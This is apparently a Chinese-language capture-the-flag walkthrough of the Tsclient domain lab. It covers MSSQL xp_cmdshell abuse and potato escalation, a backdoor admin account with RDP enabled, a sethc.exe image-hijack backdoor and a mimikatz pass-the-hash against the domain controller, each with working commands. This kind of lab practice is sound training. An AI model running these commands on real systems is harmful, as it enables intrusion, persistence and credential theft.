靶场练习--春秋云境-Tsclient

简介:

Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。

靶场链接:

https://yunjing.ichunqiu.com/major/detail/1072?type=1

挑战开始:

flag01:

还是先扫描下端口

靶场练习--春秋云境-Tsclient_第1张图片

可以发现存在mssql弱口令,还是sa用户
直接用MUDT连接
一键激活xp_cmdshell
成功执行命令
靶场练习--春秋云境-Tsclient_第2张图片

上传甜土豆,成功提权
靶场练习--春秋云境-Tsclient_第3张图片
直接添加用户,开启3389登陆

net user ljc qwer1234! /add
net localgroup administrators ljc /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

成功登陆
靶场练习--春秋云境-Tsclient_第4张图片
成功找到第一个flag
靶场练习--春秋云境-Tsclient_第5张图片

flag02:

先使用fscan探测下内网情况

172.22.8.46:445 open
172.22.8.18:445 open
172.22.8.15:445 open
172.22.8.31:445 open
172.22.8.31:139 open
172.22.8.46:139 open
172.22.8.18:139 open
172.22.8.15:139 open
172.22.8.18:135 open
172.22.8.18:1433 open
172.22.8.46:135 open
172.22.8.15:135 open
172.22.8.31:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
172.22.8.46:3389 open
172.22.8.15:3389 open
172.22.8.31:3389 open
172.22.8.18:3389 open
[*] WebTitle: http://172.22.8.46        code:200 len:703    title:IIS Windows Server
[*] NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
[*] NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
[*] NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:1caf:10cc:d0a3:ff0d
[*] NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] NetBios: 172.22.8.31     XIAORANG\WIN19-CLIENT
[*] NetBios: 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.8.18        code:200 len:703    title:IIS Windows Server
[*] NetBios: 172.22.8.15     [+]DC XIAORANG\DC01

分析下内网情况

172.22.8.15 域控
172.22.8.31 域内机器
172.22.8.18 已拿下
172.22.8.46 域内机器

先使用mimikatz抓下密码
这里发现一个john的用户hash
靶场练习--春秋云境-Tsclient_第6张图片
但是密码解不开,继续做信息搜集
quser

发现有两个rdp,另一个登录的用户john
查看下网络连接,发现另一个是从域内机器连过来的

使用模拟令牌看看john账户
这里我用的SharpToken
https://github.com/BeichenDream/SharpToken
靶场练习--春秋云境-Tsclient_第7张图片
执行net use发现一个共享
里面有一个敏感文件,查看后获取一个凭证和一个提示(镜像劫持)
靶场练习--春秋云境-Tsclient_第8张图片

尝试凭证登陆31
但提示密码过期
靶场练习--春秋云境-Tsclient_第9张图片
使用rdesktop远程修改
proxychains4 rdesktop x.x.x.x

靶场练习--春秋云境-Tsclient_第10张图片

改完后尝试了下登陆,最终只能登陆进172.22.8.46

查看了下用户
发现只是普通域用户,且不是本地管理员
靶场练习--春秋云境-Tsclient_第11张图片
这里想到了上面的提示镜像劫持
先看看注册表权限

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

靶场练习--春秋云境-Tsclient_第12张图片
这里发现普通用户都可以创建

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

设置镜像劫持shift后门

接着锁定屏幕,按5次shift,弹出命令行,提权成功
靶场练习--春秋云境-Tsclient_第13张图片
接着就添加本地管理员,使用本地账号登陆
成功找到第二个flag02
靶场练习--春秋云境-Tsclient_第14张图片

flag03:

使用mimakatz读取密码
获取到域内机器账户密码
靶场练习--春秋云境-Tsclient_第15张图片
这里查看了下域管用户
发现win2016$在域管组里
靶场练习--春秋云境-Tsclient_第16张图片
直接用mimikatz 注入hash到lsass进程中

privilege::debug
sekurlsa::pth /user:WIN2016$ /domain:g1ts /ntlm:19b241fc247a06034210b12ae3aca2d9

成功后会弹出一个命令行
直接通过命令行可以访问域控的文件
靶场练习--春秋云境-Tsclient_第17张图片
成功获取第三个flag
靶场练习--春秋云境-Tsclient_第18张图片

你可能感兴趣的:(靶场练习,网络安全,web安全)